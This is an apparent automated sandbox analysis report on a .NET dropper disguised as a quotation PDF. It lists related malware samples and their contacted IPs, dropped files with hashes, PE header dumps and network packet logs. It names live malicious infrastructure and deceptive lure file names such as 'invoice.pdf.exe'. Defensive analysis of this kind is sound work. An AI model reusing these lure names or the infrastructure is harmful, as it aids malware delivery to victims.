                                                                          https://www.bing.com/ck/a?!&&p=783f1e01b3717b07JmltdHM9MTY5NDM5MDQwMCZpZ3VpZD0xMjJiMDRkNi1kNDk3LTYwODUtMjk2My0xN2UzZDU4YTYxZDQmaW5zaWQ9NTEyNA&ptn=3&hsh=3&fclid=122b04d6-d497-6085-2963-17e3d58a61d4&u=a1aHR0cHM6Ly93d3cubGhhYWYub3JnL2x1Y2FoaWxs&ntb#YTJocVlXNW5RR2hrWld3dVkyOHVhM0k9Get hashmaliciousUnknownBrowse
                                                                          • 104.21.18.20
                                                                          rSkeledes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 172.67.205.11
                                                                          file.exeGet hashmaliciousDjvu, Fabookie, Glupteba, RedLine, SmokeLoaderBrowse
                                                                          • 172.67.181.144
                                                                          https://seroca.com/Get hashmaliciousUnknownBrowse
                                                                          • 162.159.135.42
                                                                          Re-Authentication Expiring - 2FA Policy Today From At - Monday-September-2023 18_19 PM.emlGet hashmaliciousHTMLPhisherBrowse
                                                                          • 104.17.25.14
                                                                          https://iongterm-offer.lovely-bright.bond/676f/amazing-2bd-2ba-christchurch-central-city-christchurch-8013/eb8886Get hashmaliciousHTMLPhisherBrowse
                                                                          • 104.18.22.52
                                                                          EkikxfvyTk.exeGet hashmaliciousMars Stealer, VidarBrowse
                                                                          • 104.26.11.89
                                                                          https://beedpakes-usps.comGet hashmaliciousUnknownBrowse
                                                                          • 172.64.141.25
                                                                          https://www.bing.com/ck/a?!&&p=783f1e01b3717b07JmltdHM9MTY5NDM5MDQwMCZpZ3VpZD0xMjJiMDRkNi1kNDk3LTYwODUtMjk2My0xN2UzZDU4YTYxZDQmaW5zaWQ9NTEyNA&ptn=3&hsh=3&fclid=122b04d6-d497-6085-2963-17e3d58a61d4&u=a1aHR0cHM6Ly93d3cubGhhYWYub3JnL2x1Y2FoaWxs&ntb#YTJocVlXNW5RR2hrWld3dVkyOHVhM0k9Get hashmaliciousUnknownBrowse
                                                                          • 104.21.18.20
                                                                          https://www.payment.token2049.com/page/3156941?widget=true&Get hashmaliciousUnknownBrowse
                                                                          • 104.22.55.104
                                                                          file.exeGet hashmaliciousDjvu, Fabookie, Glupteba, RedLine, SmokeLoaderBrowse
                                                                          • 172.67.181.144
                                                                          file.exeGet hashmaliciousDjvu, Fabookie, Glupteba, RedLine, SmokeLoaderBrowse
                                                                          • 172.67.181.144
                                                                          Bank.Account_Details.shtmlGet hashmaliciousHTMLPhisherBrowse
                                                                          • 104.17.25.14
                                                                          M247GB4XltwaFyqp.elfGet hashmaliciousMiraiBrowse
                                                                          • 45.85.242.114
                                                                          obetslX3P4.dllGet hashmaliciousBumbleBeeBrowse
                                                                          • 92.119.178.40
                                                                          Factura-de-transporte.exeGet hashmaliciousBandook BackdoorBrowse
                                                                          • 83.97.20.51
                                                                          QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, AveMariaBrowse
                                                                          • 91.207.102.163
                                                                          5YvNQyeUBQ.dllGet hashmaliciousBumbleBeeBrowse
                                                                          • 92.119.178.40
                                                                          bPEU.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                          • 172.94.40.145
                                                                          bPF5.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                          • 172.94.40.145
                                                                          bPF2.exeGet hashmaliciousRemcosBrowse
                                                                          • 172.94.40.145
                                                                          bPD6.exeGet hashmaliciousNjratBrowse
                                                                          • 172.94.40.145
                                                                          bPDf.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                          • 172.94.40.145
                                                                          wWXug6TmVr.exeGet hashmaliciousRemcosBrowse
                                                                          • 185.156.174.115
                                                                          SjIhwRccy4.elfGet hashmaliciousMiraiBrowse
                                                                          • 172.102.202.63
                                                                          1694422806f132ec32d7b9ec4a11374f7334b69c1a2736bdb3601744fbf9378c2a86485f6c596.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                          • 185.156.174.115
                                                                          JOR6kx99tx.elfGet hashmaliciousMiraiBrowse
                                                                          • 213.109.189.138
                                                                          bikDcpqqea.elfGet hashmaliciousMiraiBrowse
                                                                          • 45.86.28.87
                                                                          LdniCba202.elfGet hashmaliciousMiraiBrowse
                                                                          • 45.86.28.61
                                                                          Hilix.arm.elfGet hashmaliciousMiraiBrowse
                                                                          • 45.86.28.74
                                                                          o5ldnjhaMJ.elfGet hashmaliciousMiraiBrowse
                                                                          • 38.201.102.161
                                                                          pandora.arm.elfGet hashmaliciousMiraiBrowse
                                                                          • 38.201.237.118
                                                                          bP53.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                          • 172.94.40.145

                                                                          JA3 Fingerprints

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          3b5074b1b5d032e5620f69f9f700ff0eE-DEKONT1,DOC.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                                                          • 162.159.133.233
                                                                          revised_proforma_invoice.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 162.159.133.233
                                                                          0hXpOpYdvR.exeGet hashmaliciousXmrigBrowse
                                                                          • 162.159.133.233
                                                                          SecuriteInfo.com.W32.MSIL_Kryptik.JML.gen.Eldorado.26148.25502.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 162.159.133.233
                                                                          SecuriteInfo.com.Trojan.PackedNET.2362.25497.12028.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 162.159.133.233
                                                                          file.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 162.159.133.233
                                                                          document.vbsGet hashmaliciousAgentTeslaBrowse
                                                                          • 162.159.133.233
                                                                          Swift_Copy.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 162.159.133.233
                                                                          140802200220531MES_S_Quote.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 162.159.133.233
                                                                          SOA_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 162.159.133.233
                                                                          DN-180923.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 162.159.133.233
                                                                          PtEAK4aovw.exeGet hashmaliciousXmrig, zgRATBrowse
                                                                          • 162.159.133.233
                                                                          TLljBNCnA7.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 162.159.133.233
                                                                          RV5Fsl40wI.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                                          • 162.159.133.233
                                                                          Readme.lnkGet hashmaliciousAsyncRAT, AveMaria, UACMe, VenomRAT, Xmrig, zgRATBrowse
                                                                          • 162.159.133.233
                                                                          TR23-USD-33_Incoice_of_MV_ADAMOON.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 162.159.133.233
                                                                          INVOICE.exeGet hashmaliciousAgentTesla, Snake KeyloggerBrowse
                                                                          • 162.159.133.233
                                                                          drafted_custom_form_1.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 162.159.133.233
                                                                          drafted_custom_form_2.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 162.159.133.233
                                                                          Transfer_TF202309-0103-TF202309-0543.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 162.159.133.233

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.log

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):927
                                                                          Entropy (8bit):5.364918554738821
                                                                          Encrypted:false
                                                                          SSDEEP:24:MLUE4K5E4KI2KDE4KhKYIqDcfJKhRAE4KzQKJE4Ad:MIHK5HKI2YHKhBUoRAHKz9JH0
                                                                          MD5:3800AA4EE7A10EDCAA5D3FCD96151E3A
                                                                          SHA1:C9B1228E62688CE877FA42D4EE5F406437049493
                                                                          SHA-256:D03F701D4E6D53F57DDC5B6D86183D1237CB966C931B6E82C5D45C7DBE8E06BE
                                                                          SHA-512:D1A25B9928A86A527FF880D79C6002314772E1BAAB41033F09E3433847BE56345B5ABE8176156786E487F18ADFC63FDD488108129BD6BA14E8660C81B46AFFB3
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\2bef38851483abae82f1172c1aaa604c\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\9d04ce1d8a3042f50b54c7f9ccdb4068\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2e14a1befe55e7d9ad2457ceb5267e36\System.Xml.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\1aff708a68d7a055e25b20efa5a36148\System.Net.Http.ni.dll",0..

                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\donexx.exe.log

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\donexx.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):927
                                                                          Entropy (8bit):5.364918554738821
                                                                          Encrypted:false
                                                                          SSDEEP:24:MLUE4K5E4KI2KDE4KhKYIqDcfJKhRAE4KzQKJE4Ad:MIHK5HKI2YHKhBUoRAHKz9JH0
                                                                          MD5:3800AA4EE7A10EDCAA5D3FCD96151E3A
                                                                          SHA1:C9B1228E62688CE877FA42D4EE5F406437049493
                                                                          SHA-256:D03F701D4E6D53F57DDC5B6D86183D1237CB966C931B6E82C5D45C7DBE8E06BE
                                                                          SHA-512:D1A25B9928A86A527FF880D79C6002314772E1BAAB41033F09E3433847BE56345B5ABE8176156786E487F18ADFC63FDD488108129BD6BA14E8660C81B46AFFB3
                                                                          Malicious:false
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\2bef38851483abae82f1172c1aaa604c\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\9d04ce1d8a3042f50b54c7f9ccdb4068\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2e14a1befe55e7d9ad2457ceb5267e36\System.Xml.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\1aff708a68d7a055e25b20efa5a36148\System.Net.Http.ni.dll",0..

                                                                          C:\Users\user\AppData\Local\Temp\donexx.exe

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):363008
                                                                          Entropy (8bit):7.808967718409047
                                                                          Encrypted:false
                                                                          SSDEEP:6144:BKpYEOv3iCLLVNlvC7W22BTF20nJcpXNtbMOdsjxaRkc47:BKpKvSevCP8dJErIOdAc4
                                                                          MD5:5CA8DE5B7C87D36341F0578A03615AEE
                                                                          SHA1:6629EC5DDC56DE790468824F4DB7DB590D045F4A
                                                                          SHA-256:31E5881B79919C18F8444AC3300EB2A3550100754D869D19A9CCACAF874DF75B
                                                                          SHA-512:7296479DA65B9A0E4D6B5D83D11F313A66E933DBB14DBA1433C2CD62F75601ADEA60B2B023ADEE1BBCA0B9DCFA6F4D4F4F25F80FEF146AAAE49320B2D5D45F26
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                                          • Antivirus: Virustotal, Detection: 47%, Browse
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...|..e.....................n.......8... ........@.. ....................................`.................................T8..W....@...l........................................................................... ............... ..H............text........ ...................... ..`.rsrc....l...@...l..................@..@.reloc..............................@..B.................8......H............8...........v..............................................0..........(B...*.*Fs....(....&(....*...0............8.....(..........&......,..*...................0..|.......s...... .K..(6...(.... .K..(6...(....o.....s......(....u....s........s.........o........ ..,...o......,..o......,..o.......*.(....L..Y........B.#e..........io.......0..7........(....o....(.... .K..(6...o.... .K..(6... .......o....*..(....*.~....-# .K..(6........(....o....s.........~....*.~....*.

                                                                          C:\Users\user\AppData\Roaming\Fhzejfh.exe

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\donexx.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):363008
                                                                          Entropy (8bit):7.808967718409047
                                                                          Encrypted:false
                                                                          SSDEEP:6144:BKpYEOv3iCLLVNlvC7W22BTF20nJcpXNtbMOdsjxaRkc47:BKpKvSevCP8dJErIOdAc4
                                                                          MD5:5CA8DE5B7C87D36341F0578A03615AEE
                                                                          SHA1:6629EC5DDC56DE790468824F4DB7DB590D045F4A
                                                                          SHA-256:31E5881B79919C18F8444AC3300EB2A3550100754D869D19A9CCACAF874DF75B
                                                                          SHA-512:7296479DA65B9A0E4D6B5D83D11F313A66E933DBB14DBA1433C2CD62F75601ADEA60B2B023ADEE1BBCA0B9DCFA6F4D4F4F25F80FEF146AAAE49320B2D5D45F26
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                                          • Antivirus: Virustotal, Detection: 47%, Browse
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...|..e.....................n.......8... ........@.. ....................................`.................................T8..W....@...l........................................................................... ............... ..H............text........ ...................... ..`.rsrc....l...@...l..................@..@.reloc..............................@..B.................8......H............8...........v..............................................0..........(B...*.*Fs....(....&(....*...0............8.....(..........&......,..*...................0..|.......s...... .K..(6...(.... .K..(6...(....o.....s......(....u....s........s.........o........ ..,...o......,..o......,..o.......*.(....L..Y........B.#e..........io.......0..7........(....o....(.... .K..(6...o.... .K..(6... .......o....*..(....*.~....-# .K..(6........(....o....s.........~....*.~....*.

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Entropy (8bit):7.826213413307594
                                                                          TrID:
                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                          File name:QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                                                                          File size:387'072 bytes
                                                                          MD5:404e68a96892ecfcb88a114e31abb55c
                                                                          SHA1:01db0f21268b21aeeced4445220c1ab38aa74913
                                                                          SHA256:4a564bf525a47e450c43e6dfa9bc9de4395e6dfb9707d1682f88dc86046e69a0
                                                                          SHA512:792847baef149cfb80bb48f6c83ee5b811c85f1b4ec833edd988911694b890c82e5db4b9b3410f195d0a7fd3414c7ad31d7b382faafbc3953cc604845568b93e
                                                                          SSDEEP:6144:X6vT/BZdLJXklw6HoG41k4uwJLeDeQv1W3sUcRdQBzUgOhbybIlIEpuS8Y7:qvbBZZUHoZk8Yp1W3jcRjgOhebr48Y
                                                                          TLSH:7C8412581B5CF822C2786FB94DE1C5A00A74CCA3A501F31B28847C6D6CB7FA2E85656B
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y..e.................x...n........... ........@.. .......................@............`................................

                                                                          File Icon

                                                                          Icon Hash:0616262d632d9b2e

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x45971e
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x6507D879 [Mon Sep 18 04:56:25 2023 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          jmp dword ptr [00402000h]
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x596d00x4b.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x5a0000x6c00.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x620000xc.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x20000x577240x57800False0.9560993303571429data7.941086335962951IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rsrc0x5a0000x6c000x6c00False0.37449363425925924data4.696027171989365IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .reloc0x620000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_ICON0x5a2000x668Device independent bitmap graphic, 48 x 96 x 4, image size 00.35365853658536583
                                                                          RT_ICON0x5a8780x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 00.5026881720430108
                                                                          RT_ICON0x5ab700x128Device independent bitmap graphic, 16 x 32 x 4, image size 00.6486486486486487
                                                                          RT_ICON0x5aca80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.3355543710021322
                                                                          RT_ICON0x5bb600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.42418772563176893
                                                                          RT_ICON0x5c4180x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.4421965317919075
                                                                          RT_ICON0x5c9900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.36493775933609957
                                                                          RT_ICON0x5ef480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.4584896810506567
                                                                          RT_ICON0x600000x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.8829787234042553
                                                                          RT_GROUP_ICON0x604780x84data0.6363636363636364
                                                                          RT_VERSION0x6050c0x3d4data0.4142857142857143
                                                                          RT_MANIFEST0x608f00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                          Imports

                                                                          DLLImport
                                                                          mscoree.dll_CorExeMain

                                                                          Network Behavior

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Sep 19, 2023 09:21:50.067106962 CEST4972880192.168.2.4162.159.135.233
                                                                          Sep 19, 2023 09:21:50.158678055 CEST8049728162.159.135.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.165615082 CEST4972880192.168.2.4162.159.135.233
                                                                          Sep 19, 2023 09:21:50.166960001 CEST4972880192.168.2.4162.159.135.233
                                                                          Sep 19, 2023 09:21:50.258852959 CEST8049728162.159.135.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.267458916 CEST8049728162.159.135.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.321419001 CEST4972880192.168.2.4162.159.135.233
                                                                          Sep 19, 2023 09:21:50.384322882 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.384412050 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.385957956 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.397104979 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.397145033 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.602113962 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.602242947 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.603986025 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.603996038 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.604393005 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.653501987 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.712299109 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.752691031 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.840962887 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.841196060 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.841284037 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.841366053 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.841383934 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.841458082 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.841633081 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.841720104 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.841830015 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.841850996 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.841861963 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.841979980 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.842057943 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.842138052 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.842220068 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.842236042 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.842246056 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.842473984 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.842547894 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.842556000 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.842722893 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.842727900 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.842751026 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.842891932 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.842926025 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.842933893 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.842986107 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.842993021 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.843082905 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.843162060 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.843184948 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.843192101 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.843297005 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.843302965 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.843401909 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.843498945 CEST44349729162.159.133.233192.168.2.4
